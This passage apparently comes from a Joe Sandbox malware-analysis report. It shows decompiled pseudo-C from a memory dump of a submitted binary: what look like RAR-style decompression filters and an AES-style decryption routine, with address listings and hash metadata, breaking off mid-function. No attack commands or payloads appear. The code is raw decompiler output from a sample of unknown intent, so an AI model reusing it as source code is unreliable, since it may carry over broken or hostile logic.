				void* _t280;
				void* _t281;
				void* _t282;
				signed int _t286;
				intOrPtr _t287;
				void* _t288;
				signed char* _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				char _t293;
				intOrPtr* _t295;
				signed char _t296;
				signed int _t301;
				signed int _t302;
				intOrPtr _t304;
				intOrPtr* _t306;
				signed char* _t307;
				signed int _t308;
				signed int _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed char _t320;
				intOrPtr _t321;
				intOrPtr _t322;
				unsigned int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t331;
				signed char _t332;
				signed char* _t333;
				signed char _t335;
				signed int _t336;
				signed int _t337;
				void* _t338;
				void* _t339;
				void* _t340;
				signed int _t343;
				signed int _t344;
				signed char* _t345;
				signed int _t346;
				signed int _t348;
				intOrPtr _t350;
				signed int _t351;
				signed int _t354;
				void* _t358;
				signed int _t359;
				signed char* _t360;
				signed int _t361;
				void* _t362;
				void* _t363;

				_t349 = __ecx;
				_t188 =  *((intOrPtr*)(_t363 + 4)) - 1;
				if(_t188 == 0) {
					L84:
					_t189 =  *(_t349 + 0x14);
					_t295 =  *_t349;
					_t350 =  *((intOrPtr*)(_t349 + 0x1c));
					_t288 = _t189 - 4;
					if(_t288 > 0x3fffc) {
						L96:
						return 0;
					}
					_t338 = 0;
					_t192 = (_t189 & 0xffffff00 |  *((intOrPtr*)(_t363 + 0x64)) == 0x00000002) + 0xe8;
					 *((char*)(_t363 + 0x13)) = _t192;
					if(_t288 == 0) {
						L95:
						return 1;
					} else {
						goto L86;
					}
					do {
						L86:
						_t321 =  *_t295;
						_t295 = _t295 + 1;
						_t339 = _t338 + 1;
						_t350 = _t350 + 1;
						if(_t321 == 0xe8 || _t321 == _t192) {
							_t322 =  *_t295;
							if(_t322 >= 0) {
								if(_t322 - 0x1000000 < 0) {
									 *_t295 = _t322 - _t350;
								}
							} else {
								if(_t350 + _t322 >= 0) {
									 *_t295 = _t322 + 0x1000000;
								}
							}
							_t192 =  *((intOrPtr*)(_t363 + 0x13));
							_t295 = _t295 + 4;
							_t338 = _t339 + 4;
							_t350 = _t350 + 4;
						}
					} while (_t338 < _t288);
					goto L95;
				}
				_t197 = _t188 - 1;
				if(_t197 == 0) {
					goto L84;
				}
				_t198 = _t197 - 1;
				if(_t198 == 0) {
					_t289 =  *__ecx;
					_t340 = __ecx[5] - 0x15;
					if(_t340 > 0x3ffeb) {
						goto L96;
					}
					_t325 = __ecx[7] >> 4;
					 *(_t363 + 0x28) = _t325;
					if(_t340 == 0) {
						goto L95;
					}
					_t343 = (_t340 - 1 >> 4) + 1;
					 *(_t363 + 0x38) = _t343;
					do {
						_t201 =  *_t289 & 0x1f;
						if(_t201 < 0x10) {
							goto L82;
						}
						_t202 =  *((intOrPtr*)(_t201 + 0xcfe078));
						if(_t202 == 0) {
							goto L82;
						}
						_t344 =  *(_t363 + 0x28);
						_t296 = 0;
						_t326 = _t202 & 0x000000ff;
						 *(_t363 + 0x30) = 0;
						 *(_t363 + 0x40) = _t326;
						_t358 = 0x12;
						do {
							if((_t326 & 1) != 0) {
								_t168 = _t358 + 0x18; // 0x2a
								if(E00CCC985(_t289, _t168, 4) == 5) {
									E00CCC9D0(_t289, E00CCC985(_t289, _t358, 0x14) - _t344 & 0x000fffff, _t358, 0x14);
								}
								_t326 =  *(_t363 + 0x3c);
								_t296 =  *(_t363 + 0x2c);
							}
							_t296 = _t296 + 1;
							_t358 = _t358 + 0x29;
							 *(_t363 + 0x2c) = _t296;
						} while (_t358 <= 0x64);
						_t343 =  *(_t363 + 0x38);
						_t325 =  *(_t363 + 0x28);
						L82:
						_t289 =  &(_t289[0x10]);
						_t325 = _t325 + 1;
						_t343 = _t343 - 1;
						 *(_t363 + 0x28) = _t325;
						 *(_t363 + 0x38) = _t343;
					} while (_t343 != 0);
					goto L95;
				}
				_t212 = _t198 - 1;
				if(_t212 == 0) {
					_t213 = __ecx[1];
					_t345 = __ecx[5];
					 *(_t363 + 0x18) = _t213;
					_t290 = _t213 - 3;
					if(_t345 - 3 > 0x1fffd || _t290 > _t345) {
						goto L96;
					} else {
						_t215 = __ecx[2];
						 *(_t363 + 0x20) = _t215;
						if(_t215 > 2) {
							goto L96;
						}
						_t216 =  *__ecx;
						 *(_t363 + 0x14) = _t216;
						_t359 = 3;
						_t351 =  &(_t345[_t216]);
						_t217 = 0;
						 *(_t363 + 0x24) = _t351;
						_t301 = _t351 - _t290;
						 *(_t363 + 0x30) = 0;
						 *(_t363 + 0x28) = _t301;
						do {
							_t291 = 0;
							if(_t217 >= _t345) {
								goto L65;
							}
							_t327 =  *(_t363 + 0x18);
							_t360 =  &(_t217[_t301]);
							_t302 =  *(_t363 + 0x14);
							_t225 =  *(_t363 + 0x18) + 0xfffffffd - _t351;
							 *(_t363 + 0x34) = _t225;
							do {
								if( &(_t225[_t360]) >= _t327) {
									 *(_t363 + 0x3c) =  *_t360 & 0x000000ff;
									 *(_t363 + 0x3c) =  *(_t360 - 3) & 0x000000ff;
									 *(_t363 + 0x44) = E00CE614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff));
									 *(_t363 + 0x38) = E00CE614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff) + _t291 -  *(_t363 + 0x40));
									_t237 = E00CE614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff) + _t291 -  *(_t363 + 0x40));
									_t304 =  *((intOrPtr*)(_t363 + 0x4c));
									_t363 = _t363 + 0xc;
									_t332 =  *(_t363 + 0x2c);
									if(_t304 > _t332 || _t304 > _t237) {
										_t302 =  *(_t363 + 0x14);
										_t327 =  *(_t363 + 0x18);
										_t291 =  *(_t363 + 0x3c);
										if(_t332 > _t237) {
											_t291 =  *(_t363 + 0x38);
										}
									} else {
										_t302 =  *(_t363 + 0x14);
										_t327 =  *(_t363 + 0x18);
									}
								}
								_t228 = _t291 -  *_t302;
								_t302 = _t302 + 1;
								(_t360 - 3)[_t327] = _t228;
								_t360 =  &(_t360[3]);
								_t291 = _t228 & 0x000000ff;
								 *(_t363 + 0x14) = _t302;
								_t225 =  *(_t363 + 0x34);
							} while ( &(( *(_t363 + 0x34))[_t360]) < _t345);
							_t217 =  *(_t363 + 0x30);
							_t301 =  *(_t363 + 0x28);
							_t351 =  *(_t363 + 0x24);
							_t359 = 3;
							L65:
							_t217 =  &(_t217[1]);
							 *(_t363 + 0x30) = _t217;
						} while (_t217 < _t359);
						_t328 =  *(_t363 + 0x20);
						_t218 = _t345 - 2;
						if(_t328 >= _t218) {
							goto L95;
						}
						_t306 = _t328 + 2 + _t351;
						_t331 = (_t218 - _t328 - 1) / _t359 + 1;
						do {
							_t222 =  *((intOrPtr*)(_t306 - 1));
							 *((intOrPtr*)(_t306 - 2)) =  *((intOrPtr*)(_t306 - 2)) + _t222;
							 *_t306 =  *_t306 + _t222;
							_t306 = _t306 + _t359;
							_t331 = _t331 - 1;
						} while (_t331 != 0);
						goto L95;
					}
				}
				_t238 = _t212 - 1;
				if(_t238 == 0) {
					_t307 = __ecx[5];
					_t333 =  *__ecx;
					_t239 = __ecx[1];
					 *(_t363 + 0x30) = _t333;
					 *(_t363 + 0x34) = _t307;
					 *(_t363 + 0x38) = _t239;
					 *(_t363 + 0x40) =  &(_t333[_t307]);
					if(_t307 > 0x20000 || _t239 > 0x80 || _t239 == 0) {
						goto L96;
					} else {
						_t346 = 0;
						 *(_t363 + 0x3c) = 0;
						if(_t239 == 0) {
							goto L95;
						} else {
							goto L20;
						}
						do {
							L20:
							 *(_t363 + 0x24) =  *(_t363 + 0x24) & 0x00000000;
							 *(_t363 + 0x20) =  *(_t363 + 0x20) & 0x00000000;
							_t354 = 0;
							 *(_t363 + 0x1c) =  *(_t363 + 0x1c) & 0x00000000;
							_t292 = 0;
							 *(_t363 + 0x18) =  *(_t363 + 0x18) & 0x00000000;
							_t361 = 0;
							 *(_t363 + 0x20) = 0;
							E00CDFFF0(_t346, _t363 + 0x44, 0, 0x1c);
							 *(_t363 + 0x38) =  *(_t363 + 0x38) & 0;
							_t363 = _t363 + 0xc;
							 *(_t363 + 0x28) = _t346;
							if(_t346 >=  *(_t363 + 0x34)) {
								_t242 =  *(_t363 + 0x38);
								goto L49;
							} else {
								goto L21;
							}
							do {
								L21:
								_t308 =  *(_t363 + 0x20);
								 *(_t363 + 0x18) = _t308 -  *(_t363 + 0x1c);
								_t245 =  *(_t363 + 0x30);
								 *(_t363 + 0x1c) = _t308;
								_t335 =  *_t245;
								 *(_t363 + 0x30) =  &(_t245[1]);
								_t314 = ( *(_t363 + 0x18) * _t354 + _t361 *  *(_t363 + 0x18) + _t292 *  *(_t363 + 0x20) +  *(_t363 + 0x24) * 0x00000008 >> 0x00000003 & 0x000000ff) - (_t335 & 0x000000ff);
								 *( *(_t363 + 0x28) +  *(_t363 + 0x40)) = _t314;
								_t357 = _t335 << 3;
								 *(_t363 + 0x24) = _t314 -  *(_t363 + 0x24);
								 *(_t363 + 0x28) = _t314;
								 *((intOrPtr*)(_t363 + 0x48)) =  *((intOrPtr*)(_t363 + 0x48)) + E00CE614A(_t335, _t335 << 3);
								 *((intOrPtr*)(_t363 + 0x50)) =  *((intOrPtr*)(_t363 + 0x50)) + E00CE614A(_t335, (_t335 << 3) -  *(_t363 + 0x20));
								 *((intOrPtr*)(_t363 + 0x58)) =  *((intOrPtr*)(_t363 + 0x58)) + E00CE614A(_t335,  *(_t363 + 0x24) + (_t335 << 3));
								 *((intOrPtr*)(_t363 + 0x60)) =  *((intOrPtr*)(_t363 + 0x60)) + E00CE614A(_t335, (_t335 << 3) -  *(_t363 + 0x24));
								 *((intOrPtr*)(_t363 + 0x68)) =  *((intOrPtr*)(_t363 + 0x68)) + E00CE614A(_t335,  *(_t363 + 0x28) + (_t335 << 3));
								 *((intOrPtr*)(_t363 + 0x70)) =  *((intOrPtr*)(_t363 + 0x70)) + E00CE614A(_t335, _t357 -  *(_t363 + 0x18));
								 *((intOrPtr*)(_t363 + 0x78)) =  *((intOrPtr*)(_t363 + 0x78)) + E00CE614A(_t335, _t357 +  *(_t363 + 0x18));
								_t363 = _t363 + 0x1c;
								if(( *(_t363 + 0x2c) & 0x0000001f) != 0) {
									_t354 =  *(_t363 + 0x14);
								} else {
									_t336 =  *(_t363 + 0x44);
									_t277 = 0;
									 *(_t363 + 0x44) =  *(_t363 + 0x44) & 0;
									_t318 = 1;
									do {
										if( *(_t363 + 0x44 + _t318 * 4) < _t336) {
											_t336 =  *(_t363 + 0x44 + _t318 * 4);
											_t277 = _t318;
										}
										 *(_t363 + 0x44 + _t318 * 4) =  *(_t363 + 0x44 + _t318 * 4) & 0x00000000;
										_t318 = _t318 + 1;
									} while (_t318 < 7);
									_t354 =  *(_t363 + 0x14);
									_t278 = _t277 - 1;
									if(_t278 == 0) {
										if(_t292 >= 0xfffffff0) {
											_t292 = _t292 - 1;
										}
										goto L46;
									}
									_t279 = _t278 - 1;
									if(_t279 == 0) {
										if(_t292 < 0x10) {
											_t292 = _t292 + 1;
										}
										goto L46;
									}
									_t280 = _t279 - 1;
									if(_t280 == 0) {
										if(_t361 >= 0xfffffff0) {
											_t361 = _t361 - 1;
										}
										goto L46;
									}
									_t281 = _t280 - 1;
									if(_t281 == 0) {
										if(_t361 < 0x10) {
											_t361 = _t361 + 1;
										}
										goto L46;
									}
									_t282 = _t281 - 1;
									if(_t282 == 0) {
										if(_t354 < 0xfffffff0) {
											goto L46;
										}
										_t354 = _t354 - 1;
										L34:
										 *(_t363 + 0x14) = _t354;
										goto L46;
									}
									if(_t282 != 1 || _t354 >= 0x10) {
										goto L46;
									} else {
										_t354 = _t354 + 1;
										goto L34;
									}
								}
								L46:
								_t242 =  *(_t363 + 0x38);
								_t316 =  *(_t363 + 0x28) + _t242;
								 *(_t363 + 0x2c) =  *(_t363 + 0x2c) + 1;
								 *(_t363 + 0x28) = _t316;
							} while (_t316 <  *(_t363 + 0x34));
							_t346 =  *(_t363 + 0x3c);
							L49:
							_t346 = _t346 + 1;
							 *(_t363 + 0x3c) = _t346;
						} while (_t346 < _t242);
						goto L95;
					}
				}
				if(_t238 != 1) {
					goto L95;
				}
				_t319 = __ecx[5];
				_t362 = 0;
				_t337 = __ecx[1];
				 *(_t363 + 0x28) = _t319;
				 *(_t363 + 0x2c) = _t319 + _t319;
				if(_t319 > 0x20000 || _t337 > 0x400 || _t337 == 0) {
					goto L96;
				} else {
					_t286 = _t337;
					 *(_t363 + 0x24) = _t337;
					do {
						_t293 = 0;
						_t348 = _t319;
						if(_t319 <  *(_t363 + 0x2c)) {
							_t320 =  *(_t363 + 0x2c);
							goto L12;
							L12:
							_t287 =  *_t349;
							_t293 = _t293 -  *((intOrPtr*)(_t287 + _t362));
							_t362 = _t362 + 1;
							 *((char*)(_t287 + _t348)) = _t293;
							_t348 = _t348 + _t337;
							if(_t348 < _t320) {
								goto L12;
							} else {
								_t319 =  *(_t363 + 0x28);
								_t286 =  *(_t363 + 0x24);
								goto L14;
							}
						}
						L14:
						_t319 = _t319 + 1;
						_t286 = _t286 - 1;
						 *(_t363 + 0x28) = _t319;
						 *(_t363 + 0x24) = _t286;
					} while (_t286 != 0);
					goto L95;
				}
			}

















































































                                                    0x00ccc430
                                                    0x00ccc433
                                                    0x00ccc436
                                                    0x00ccc90a
                                                    0x00ccc90a
                                                    0x00ccc90d
                                                    0x00ccc90f
                                                    0x00ccc912
                                                    0x00ccc91b
                                                    0x00ccc979
                                                    0x00000000
                                                    0x00ccc979
                                                    0x00ccc925
                                                    0x00ccc927
                                                    0x00ccc929
                                                    0x00ccc92f
                                                    0x00ccc975
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc931
                                                    0x00ccc931
                                                    0x00ccc931
                                                    0x00ccc933
                                                    0x00ccc934
                                                    0x00ccc935
                                                    0x00ccc939
                                                    0x00ccc93f
                                                    0x00ccc943
                                                    0x00ccc95e
                                                    0x00ccc962
                                                    0x00ccc962
                                                    0x00ccc945
                                                    0x00ccc94a
                                                    0x00ccc952
                                                    0x00ccc952
                                                    0x00ccc94a
                                                    0x00ccc964
                                                    0x00ccc968
                                                    0x00ccc96b
                                                    0x00ccc96e
                                                    0x00ccc96e
                                                    0x00ccc971
                                                    0x00000000
                                                    0x00ccc931
                                                    0x00ccc43c
                                                    0x00ccc43f
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc445
                                                    0x00ccc448
                                                    0x00ccc847
                                                    0x00ccc849
                                                    0x00ccc852
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc85b
                                                    0x00ccc85e
                                                    0x00ccc864
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc86e
                                                    0x00ccc86f
                                                    0x00ccc873
                                                    0x00ccc876
                                                    0x00ccc87c
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc87e
                                                    0x00ccc886
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc888
                                                    0x00ccc88c
                                                    0x00ccc88e
                                                    0x00ccc893
                                                    0x00ccc897
                                                    0x00ccc89b
                                                    0x00ccc89c
                                                    0x00ccc8a3
                                                    0x00ccc8a7
                                                    0x00ccc8b6
                                                    0x00ccc8d1
                                                    0x00ccc8d1
                                                    0x00ccc8d6
                                                    0x00ccc8da
                                                    0x00ccc8da
                                                    0x00ccc8de
                                                    0x00ccc8df
                                                    0x00ccc8e2
                                                    0x00ccc8e6
                                                    0x00ccc8eb
                                                    0x00ccc8ef
                                                    0x00ccc8f3
                                                    0x00ccc8f3
                                                    0x00ccc8f6
                                                    0x00ccc8f7
                                                    0x00ccc8fa
                                                    0x00ccc8fe
                                                    0x00ccc8fe
                                                    0x00000000
                                                    0x00ccc908
                                                    0x00ccc44e
                                                    0x00ccc451
                                                    0x00ccc6ee
                                                    0x00ccc6f1
                                                    0x00ccc6f4
                                                    0x00ccc6f8
                                                    0x00ccc703
                                                    0x00000000
                                                    0x00ccc711
                                                    0x00ccc711
                                                    0x00ccc714
                                                    0x00ccc71b
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc721
                                                    0x00ccc723
                                                    0x00ccc729
                                                    0x00ccc72a
                                                    0x00ccc72d
                                                    0x00ccc731
                                                    0x00ccc735
                                                    0x00ccc737
                                                    0x00ccc73b
                                                    0x00ccc73f
                                                    0x00ccc73f
                                                    0x00ccc743
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc749
                                                    0x00ccc74d
                                                    0x00ccc754
                                                    0x00ccc75b
                                                    0x00ccc75d
                                                    0x00ccc761
                                                    0x00ccc765
                                                    0x00ccc76f
                                                    0x00ccc776
                                                    0x00ccc782
                                                    0x00ccc797
                                                    0x00ccc79b
                                                    0x00ccc7a0
                                                    0x00ccc7a4
                                                    0x00ccc7a7
                                                    0x00ccc7ad
                                                    0x00ccc7bd
                                                    0x00ccc7c3
                                                    0x00ccc7c7
                                                    0x00ccc7cb
                                                    0x00ccc7cd
                                                    0x00ccc7cd
                                                    0x00ccc7b3
                                                    0x00ccc7b3
                                                    0x00ccc7b7
                                                    0x00ccc7b7
                                                    0x00ccc7ad
                                                    0x00ccc7d3
                                                    0x00ccc7d5
                                                    0x00ccc7d6
                                                    0x00ccc7da
                                                    0x00ccc7dd
                                                    0x00ccc7e6
                                                    0x00ccc7ec
                                                    0x00ccc7ec
                                                    0x00ccc7f6
                                                    0x00ccc7fa
                                                    0x00ccc7fe
                                                    0x00ccc804
                                                    0x00ccc805
                                                    0x00ccc805
                                                    0x00ccc806
                                                    0x00ccc80a
                                                    0x00ccc812
                                                    0x00ccc816
                                                    0x00ccc81b
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc826
                                                    0x00ccc82d
                                                    0x00ccc830
                                                    0x00ccc830
                                                    0x00ccc833
                                                    0x00ccc836
                                                    0x00ccc838
                                                    0x00ccc83a
                                                    0x00ccc83a
                                                    0x00000000
                                                    0x00ccc83f
                                                    0x00ccc703
                                                    0x00ccc457
                                                    0x00ccc45a
                                                    0x00ccc4d6
                                                    0x00ccc4d9
                                                    0x00ccc4db
                                                    0x00ccc4de
                                                    0x00ccc4e4
                                                    0x00ccc4e8
                                                    0x00ccc4ec
                                                    0x00ccc4f6
                                                    0x00000000
                                                    0x00ccc50f
                                                    0x00ccc50f
                                                    0x00ccc511
                                                    0x00ccc517
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc51d
                                                    0x00ccc51d
                                                    0x00ccc51d
                                                    0x00ccc526
                                                    0x00ccc52b
                                                    0x00ccc52d
                                                    0x00ccc532
                                                    0x00ccc534
                                                    0x00ccc539
                                                    0x00ccc53f
                                                    0x00ccc543
                                                    0x00ccc548
                                                    0x00ccc54c
                                                    0x00ccc54f
                                                    0x00ccc557
                                                    0x00ccc6d8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc55d
                                                    0x00ccc55d
                                                    0x00ccc55d
                                                    0x00ccc56b
                                                    0x00ccc56f
                                                    0x00ccc573
                                                    0x00ccc580
                                                    0x00ccc583
                                                    0x00ccc5a9
                                                    0x00ccc5af
                                                    0x00ccc5be
                                                    0x00ccc5c2
                                                    0x00ccc5c6
                                                    0x00ccc5cf
                                                    0x00ccc5df
                                                    0x00ccc5ef
                                                    0x00ccc5ff
                                                    0x00ccc60f
                                                    0x00ccc61d
                                                    0x00ccc62a
                                                    0x00ccc62e
                                                    0x00ccc636
                                                    0x00ccc6b2
                                                    0x00ccc638
                                                    0x00ccc638
                                                    0x00ccc63c
                                                    0x00ccc63e
                                                    0x00ccc644
                                                    0x00ccc645
                                                    0x00ccc649
                                                    0x00ccc64b
                                                    0x00ccc64f
                                                    0x00ccc64f
                                                    0x00ccc651
                                                    0x00ccc656
                                                    0x00ccc657
                                                    0x00ccc65c
                                                    0x00ccc660
                                                    0x00ccc663
                                                    0x00ccc6ad
                                                    0x00ccc6af
                                                    0x00ccc6af
                                                    0x00000000
                                                    0x00ccc6ad
                                                    0x00ccc665
                                                    0x00ccc668
                                                    0x00ccc6a5
                                                    0x00ccc6a7
                                                    0x00ccc6a7
                                                    0x00000000
                                                    0x00ccc6a5
                                                    0x00ccc66a
                                                    0x00ccc66d
                                                    0x00ccc69d
                                                    0x00ccc69f
                                                    0x00ccc69f
                                                    0x00000000
                                                    0x00ccc69d
                                                    0x00ccc66f
                                                    0x00ccc672
                                                    0x00ccc695
                                                    0x00ccc697
                                                    0x00ccc697
                                                    0x00000000
                                                    0x00ccc695
                                                    0x00ccc674
                                                    0x00ccc677
                                                    0x00ccc68d
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc68f
                                                    0x00ccc684
                                                    0x00ccc684
                                                    0x00000000
                                                    0x00ccc684
                                                    0x00ccc67c
                                                    0x00000000
                                                    0x00ccc683
                                                    0x00ccc683
                                                    0x00000000
                                                    0x00ccc683
                                                    0x00ccc67c
                                                    0x00ccc6b6
                                                    0x00ccc6ba
                                                    0x00ccc6be
                                                    0x00ccc6c0
                                                    0x00ccc6c4
                                                    0x00ccc6c8
                                                    0x00ccc6d2
                                                    0x00ccc6dc
                                                    0x00ccc6dc
                                                    0x00ccc6dd
                                                    0x00ccc6e1
                                                    0x00000000
                                                    0x00ccc6e9
                                                    0x00ccc4f6
                                                    0x00ccc45f
                                                    0x00000000
                                                    0x00000000
                                                    0x00ccc465
                                                    0x00ccc468
                                                    0x00ccc46a
                                                    0x00ccc46d
                                                    0x00ccc474
                                                    0x00ccc47e
                                                    0x00000000
                                                    0x00ccc498
                                                    0x00ccc498
                                                    0x00ccc49a
                                                    0x00ccc49e
                                                    0x00ccc49e
                                                    0x00ccc4a0
                                                    0x00ccc4a6
                                                    0x00ccc4a8
                                                    0x00ccc4a8
                                                    0x00ccc4ac
                                                    0x00ccc4ac
                                                    0x00ccc4ae
                                                    0x00ccc4b1
                                                    0x00ccc4b2
                                                    0x00ccc4b5
                                                    0x00ccc4b9
                                                    0x00000000
                                                    0x00ccc4bb
                                                    0x00ccc4bb
                                                    0x00ccc4bf
                                                    0x00000000
                                                    0x00ccc4bf
                                                    0x00ccc4b9
                                                    0x00ccc4c3
                                                    0x00ccc4c3
                                                    0x00ccc4c4
                                                    0x00ccc4c7
                                                    0x00ccc4cb
                                                    0x00ccc4cb
                                                    0x00000000
                                                    0x00ccc49e

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00f7ee5601ba1f81d1223ced605bf6e85b0a91096ca14c1ed522844a63683ec7
                                                    • Instruction ID: 3028f0a382ec455514df48a3bede132fc412d5613b4bfbd030c3bf78e78dd9bd
                                                    • Opcode Fuzzy Hash: 00f7ee5601ba1f81d1223ced605bf6e85b0a91096ca14c1ed522844a63683ec7
                                                    • Instruction Fuzzy Hash: 01F19A71A083418FC718CF29C5D4A2EBBE5EFDA354F144A2EF49AD7252D630EA45CB42
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCE9B7 Relevance: .3, Instructions: 320COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CCE9B7(void* __ebx, intOrPtr __ecx, void* __esi) {
				void* _t220;
				intOrPtr _t227;
				void* _t250;
				signed char _t252;
				signed int _t300;
				signed int* _t303;
				signed char _t346;
				unsigned int _t348;
				signed int _t351;
				unsigned int _t354;
				signed int* _t357;
				signed int _t361;
				signed int _t366;
				signed int _t370;
				signed int _t374;
				signed char _t376;
				signed int* _t380;
				signed int _t387;
				signed int _t392;
				intOrPtr _t394;
				signed char _t395;
				signed char _t396;
				signed char _t397;
				unsigned int _t399;
				signed int _t402;
				unsigned int _t405;
				unsigned int _t407;
				unsigned int _t408;
				signed int _t409;
				signed int _t414;
				unsigned int _t415;
				unsigned int _t416;
				signed int _t418;
				signed int _t422;
				signed int _t423;
				intOrPtr _t425;
				signed int _t426;
				void* _t430;
				void* _t431;

				_t407 =  *(_t430 + 0x6c);
				_t425 = __ecx;
				 *((intOrPtr*)(_t430 + 0x24)) = __ecx;
				if(_t407 != 0) {
					_t408 = _t407 >> 4;
					 *(_t430 + 0x6c) = _t408;
					if( *((char*)(__ecx)) == 0) {
						 *((intOrPtr*)(_t430 + 0x38)) = __ecx + 8;
						E00CE0320(_t430 + 0x5c, __ecx + 8, 0x10);
						_t431 = _t430 + 0xc;
						if(_t408 == 0) {
							L13:
							return E00CE0320( *((intOrPtr*)(_t431 + 0x38)), _t431 + 0x58, 0x10);
						}
						_t392 =  *(_t431 + 0x68);
						 *(_t431 + 0x24) = _t392 + 8;
						_t227 =  *((intOrPtr*)(_t431 + 0x78));
						_t394 = _t392 - _t227 - 8;
						 *((intOrPtr*)(_t431 + 0x34)) = _t394;
						_t357 = _t227 + 8;
						 *(_t431 + 0x28) = _t357;
						do {
							_t414 =  *(_t425 + 4);
							 *(_t431 + 0x30) = _t357 + _t394;
							E00CCE985(_t431 + 0x54, _t357 + _t394, (_t414 << 4) + 0x18 + _t425);
							_t395 =  *(_t431 + 0x4c);
							 *(_t431 + 0x10) =  *(0xd061c8 + (_t395 & 0x000000ff) * 4) ^  *(0xd06dc8 + ( *(_t431 + 0x53) & 0x000000ff) * 4) ^  *(0xd069c8 + ( *(_t431 + 0x56) & 0x000000ff) * 4);
							_t346 =  *(_t431 + 0x58);
							_t361 =  *(_t431 + 0x10) ^  *(0xd065c8 + (_t346 & 0x000000ff) * 4);
							 *(_t431 + 0x10) = _t361;
							 *(_t431 + 0x3c) = _t361;
							_t396 =  *(_t431 + 0x50);
							_t366 =  *(0xd065c8 + (_t395 & 0x000000ff) * 4) ^  *(0xd061c8 + (_t396 & 0x000000ff) * 4) ^  *(0xd06dc8 + ( *(_t431 + 0x57) & 0x000000ff) * 4) ^  *(0xd069c8 + ( *(_t431 + 0x5a) & 0x000000ff) * 4);
							 *(_t431 + 0x1c) = _t366;
							 *(_t431 + 0x40) = _t366;
							_t397 =  *(_t431 + 0x54);
							 *(_t431 + 0x14) =  *(0xd069c8 + ( *(_t431 + 0x4e) & 0x000000ff) * 4) ^  *(0xd065c8 + (_t396 & 0x000000ff) * 4);
							_t370 =  *(_t431 + 0x14) ^  *(0xd061c8 + (_t397 & 0x000000ff) * 4) ^  *(0xd06dc8 + ( *(_t431 + 0x5b) & 0x000000ff) * 4);
							 *(_t431 + 0x14) = _t370;
							 *(_t431 + 0x44) = _t370;
							 *(_t431 + 0x18) =  *(0xd06dc8 + ( *(_t431 + 0x4f) & 0x000000ff) * 4) ^  *(0xd069c8 + ( *(_t431 + 0x52) & 0x000000ff) * 4);
							_t374 =  *(_t431 + 0x18) ^  *(0xd065c8 + (_t397 & 0x000000ff) * 4) ^  *(0xd061c8 + (_t346 & 0x000000ff) * 4);
							_t250 = _t414 - 1;
							 *(_t431 + 0x18) = _t374;
							 *(_t431 + 0x48) = _t374;
							if(_t250 <= 1) {
								goto L9;
							}
							_t409 =  *(_t431 + 0x1c);
							_t422 = (_t250 + 2 << 4) + _t425;
							_t426 =  *(_t431 + 0x10);
							 *(_t431 + 0x18) = _t422;
							 *(_t431 + 0x20) = _t250 - 1;
							do {
								_t405 =  *_t422 ^  *(_t431 + 0x14);
								 *(_t431 + 0x10) =  *(_t422 - 8) ^ _t426;
								 *(_t431 + 0x1c) =  *(_t422 + 4) ^ _t374;
								_t354 =  *(_t422 - 4) ^ _t409;
								_t423 =  *(_t431 + 0x1c);
								_t426 =  *(0xd069c8 + (_t405 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd065c8 + (_t423 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd06dc8 + (_t354 >> 0x18) * 4) ^  *(0xd061c8 + ( *(_t431 + 0x10) & 0x000000ff) * 4);
								 *(_t431 + 0x3c) = _t426;
								_t409 =  *(0xd069c8 + (_t423 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd065c8 + ( *(_t431 + 0x10) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd06dc8 + (_t405 >> 0x18) * 4) ^  *(0xd061c8 + (_t354 & 0x000000ff) * 4);
								 *(_t431 + 0x40) = _t409;
								_t387 =  *(0xd065c8 + (_t354 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xd069c8 + ( *(_t431 + 0x10) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xd06dc8 + (_t423 >> 0x18) * 4) ^  *(0xd061c8 + (_t405 & 0x000000ff) * 4);
								 *(_t431 + 0x14) = _t387;
								 *(_t431 + 0x44) = _t387;
								_t422 =  *(_t431 + 0x18) - 0x10;
								 *(_t431 + 0x18) = _t422;
